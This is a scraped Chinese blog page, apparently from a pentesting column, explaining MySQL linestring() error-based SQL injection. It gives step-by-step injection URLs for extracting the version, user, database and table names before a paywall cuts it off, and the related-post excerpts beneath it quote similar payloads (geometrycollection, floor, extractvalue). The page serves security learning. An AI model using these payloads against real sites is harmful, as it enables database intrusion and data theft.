【漏洞挖掘】——112、linestring报错注入深入刨析

最新推荐文章于 2024-10-03 01:54:42 发布
最新推荐文章于 2024-10-03 01:54:42 发布
阅读量135 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 【WEB渗透】 文章标签: oracle 数据库 Linestring报错注入 报错注入 SQL注入 web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Fly_hps/article/details/139865801
linestring报错注入流程
获取数据库版本信息
  • http://www.example.com/?id=1' and linestring((select * from (select * from(select version())a)b)) --+
获取用户名相关信息
  • http://www.example.com/?id=1' and linestring((select * from (select * from(select user())a)b)) --+
获取数据库名的信息
  • http://www.example.com/?id=1' and linestring((select * from (select * from(select database())a)b)) --+
获取数据库的表信息

查询第一个表名信息:

  • http://www.example.com/?id=1' and linestring((select * from (select * from(select table_name from information_schema.tables where table_schema=database() limit 0,1)a)b)) --+

查询第二个表名信息:

  • http://www.example.com/?id=1' and linestring((select * from (se
了解本专栏 订阅专栏 解锁全文
漏洞挖掘】——111、polygon报错注入深入
Fly_鹏程万里
06-21 256
其余的依次变量limit x,y中的x的值来获取表名信息即可~其余的依次变量limit x,y中的x的值来获取表名信息即可~这里以Less-05为例做演示。
漏洞挖掘】——106、Floor报错注入
Fly_鹏程万里
06-21 142
报错注入是一种根据报错信息来构造注入语句并从错误信息中获取数据库信息的一种注入方法,常见的报错注入主要包括以下几种:rand() :可以产生一个在0和1之间的随机数,例如:rand(x):以x为随机数发生器种子值来生成固定随机数,例如:rand()*x:生成0~x之间的伪随机数,例如:FLOOR(x) 函数返回小于 x 的最大整数值,例如:类似的函数还有:通过上面的了解可以发现rand()函数可以生成一个指定范围内的伪随机数(小数),而floor可以取整,那么如果要生成一个整数呢?可以结合将Floor()与
MYSQL 通过GeometryCollection()报错注入
Ciyaso的博客
01-18 2496
函数解释 GeometryCollection是由1个或多个任意类几何对象构成的几何对象。GeometryCollection中的所有元素必须具有相同的空间参考系(即相同的坐标系)。对GeometryCollection的元素无任何限制,但下面介绍的GeometryCollection的子类会限制其成员。这类限制可能基于: 元素类型(例如,MultiPoint可能仅包含Point元素)。 维数 对元素间空间交迭程度的限制 官方文档中举例的用法如下: GEOMETRYCOLLECTION(POINT(10 1
echarts 使用geojson数据展示 GeometryCollection出错怎么办?
Aurora_juan的博客
04-12 2166
echarts4和echarts5都存在这个问题 对比geojson数据发现,因为数据类型中有GeometryCollection存在。生成的地图里有一个区域为两块不连续的地图块,所以生成的geoJson中此区域的geometry.type===GeometryCollection 解决方法 修改源码 node_modules\echarts\lib\coord\geo\parseGeoJson.js 116行 export default function parseGeoJSON(geoJson, n
报错注入函数指南
qq_28624871的博客
05-01 2457
1. geometrycollection() mysql版本5.5   (1)函数解释: GeometryCollection是由1个或多个任意类几何对象构成的几何对象。GeometryCollection中的所有元素必须具有相同的空间参考系(即相同的坐标系)。   (2)官方文档中举例的用法如下: GEOMETRYCOLLECTION(POINT(10 10), POINT(30 30), LINESTRING(15 15, 20 20))   (3)报错原因: 因为MYSQL无法使用这样的字符串画
multipoint mysql_十种MYSQL显错注入原理讲解(二)
weixin_39879651的博客
02-04 337
上一篇讲过,三种MYSQL显错注入原理。下面我继续讲解。1、geometrycollection()select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));函数讲解:GeometryCollection是由1个或多个任意类几何对象构成的几何对象。Geo...
渗透测试工程师面试题总结(一)
记录开发和安全学习过程中的点点滴滴
08-26 1652
渗透测试工程师的面试题进行总结
20年时候收集的一些信息安全岗面试题
课嗨教育的专栏
05-02 8221
目录 面试一 面试二 面试三 更多资料可:渗透测试基础课-课程进度_课嗨教育的博客-优快云博客 面试一 个人介绍: 自我介绍要点:不要用长逻辑句,短小精悍 控制在3-4分钟 1、自我介绍姓名年龄哪里人学校情况不是重点,作为顺滑开场 2、经历与技能啥时候开始学web攻防,实习经历(神舟,做了什么;尚然,做了什么),让人家清楚历史引入技术主题,挑重点 3、业绩/成绩: 研究类:freebuff SRC I春秋...
2024大数据面试题汇总(完善中。。。)
为人性僻 语不惊人
06-18 2462
自己汇总的面试题,涉及到大数据的常用组件,将持续更新... ... 部分图片不全,后期继续完善 更新记录: 2024-6-18 初版0.1.0 :hadoop,hbase,doris,hive,mysql,es 2024-6-26 1.0.0 : java,spark,redis,kafka,flink,kafka,数据仓库
基于函数报错注入·
qq_42764906的博客
03-31 353
首先查看是否有漏洞(注:用英文状态下的’否则出不来 用大写锁定也可以) 输入 得到 我们需要做一些处理 否则只会出现一部分 会被吃掉 加~ ~为 0x7e 分别 得到 得到 输入 得到 用limit 从第一个位置开始取limit 0,1 如果是第二个位置limit1,1 以此类推 输入 得到 输入 输入 得到 输入 得到 输入 得到 汇总 ...
报错注入
weixin_43271438的博客
10-01 677
报错注入一般流程 报错注入的五种函数 全部都以查user()为例子~ floor() id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) extractvalue() id = 1 and ...
盲注、报错注入、宽字节注入、堆叠注入学习笔记
qq_42562304的博客
06-15 1061
基于布尔的盲注: 传入“”错误“”参数和“正确”参数,观察页面是否发生了变化。 基于时间的盲注: 有些数据库对错误信息做了安全配置,是的无法通过以上方式(即页面返回的真假)探测注入点。此时,可以通过设置sleep语句(延迟多长时间,判断后台执行的时间)来探测注入点,称为基于时间的盲注。 补充函数: ASCII码对照表: 判断DVWA靶场盲注这关的库名: 可以判断为基于布尔的盲注。以下为通过ascii函数爆库名: 说明库的第一个字符ascci码为100,查表后得到第一个字符为d。重复以上步骤,可以得出当前
Eccharts加载geojson环形GeometryCollection格式的解决方案:Cannot read property ‘length‘ of undefined
漏刻有时数据可视化大屏(PHP&ECHARTS智能化开源软件系统)
08-25 1238
当echarts加载通过mapshaper合并后的geojson格式,会出现错误提示:Uncaught TypeError: Cannot read property 'length' of undefined 项目需求 在阿里Datav下载标准的geojson格式数据后,发现部分区域本身是一个整体,出现环形区域,通过分割线将其划成多个部分,影响地图的可视化效果。 通过mapshaper合并后的数据格式为环形格式GeometryCollection,该格式无法正常加载 解决方案 手动调整格式,标准格
sql注入报错注入
2301_80913334的博客
04-12 3853
掌握好extractvalue、updatexml、floor报错,floor报错较难需要多理解,updatexml较为常用报错注入是通过特殊函数错误使用并使其输出错误结果来获取信息的。是一种页面响应形式。响应过程:用户在前台页面输入检索内容后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行数据库将执行的结果返回后台,后台将数据库执行的结果无加区别的显示在前台页面报错注入存在基础:后台对于输入输出的合理性没有做检查演示:输入正常语句情况下页面。
mysql报错注入原理,MYSQL 其他函数报错注入
weixin_32685145的博客
03-24 159
都为空间数据储存函数,其余函数的报错原理与GeometryCollection()原理相同MYSQL 中的空间数据存储MySQL支持以下数据类型:Geometry:可以存储所有的几何类型Point:简单点LINESTRING:简单线POLYGON:简单面MULTIPOINT:多点MULITILINESTRING:多线MUILITIPOLYGON:很多方面GEOMETRYCOLLECTION:任何几...
geometry创建Polygon多边形时报错Invalid number of points in LinearRing (found 2 - must be 0 or >= 4)
qq_59125846的博客
07-31 671
由于网上的这个报错有点少,所以我在此记录一下。
SQL注入报错注入方法汇总
wanggonghanfei的博客
10-03 2586
响应过程:用户在前台页面输入检索内容后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行数据库将执行的结果返回后台,后台将数据库执行的结果无加区别的显示在前台页面0.2 类型。
sql注入--6其他报错注入
技术骨干小李的博客
07-22 467
报错注入有很多种,重点用的是floor,updatexml,extractvalue。floor报错单独做了一篇,这一篇的报错注入主要讲Updatexml()报错注入和extractvalue()报错注入。基本上常用的这三种没有版本限制,其他的报错注入有版本限制(我floor报错那篇也发现了一个版本限制)...
linestring
最新发布
01-25
### Linestring 地理信息系统几何类型 #### 定义与特点 `LineString` 是一种用于表示一系列连接点形成的线段的地理空间数据类型。这种类型属于 OGC 的简单特征规范的一部分,允许对二维空间中的线串进行建模[^3]。 在 PostGIS 中,由于其基于平面假设,因此 `LineString` 上的操作遵循笛卡尔数学原则,两点间最短路径为直线,这使得距离、长度等测量可以直接通过矢量运算完成[^1]。 对于 MySQL GIS 实现来说,`LineString` 类型同样被支持,并可用于创建复杂的空间结构,比如道路网络或河流走向。当涉及到实际应用时,开发者可以在数据库表中定义包含此类字段并为其建立空间索引来优化查询效率[^2]。 #### 数据结构实例 下面是一个 JSON 格式的 GeoJSON 对象例子,展示了如何描述一条由多个坐标组成的 LineString: ```json { "type": "Feature", "geometry": { "type": "LineString", "coordinates": [ [-77.0365, 38.9047], [-77.0072, 38.8899], [-76.9978, 38.8979] ] }, "properties": { "name": "Sample Route" } } ``` 此代码片段展示了一条名为 “Sample Route”的线路,它经过三个地理位置点,每个位置用经度和纬度表示。 #### SQL 表设计示例 为了存储这样的信息,在关系型数据库如 MySQL 中可以这样设置表格结构: ```sql CREATE TABLE routes ( id INT AUTO_INCREMENT PRIMARY KEY, route_name VARCHAR(255), geom LINESTRING NOT NULL, SPATIAL INDEX(geom) ); ``` 这段 SQL 命令创建了一个新表 `routes` 来保存路线名称及其对应的几何形状(这里是 `LineString`),并且还设置了空间索引以便更高效地处理涉及地理位置的数据检索操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值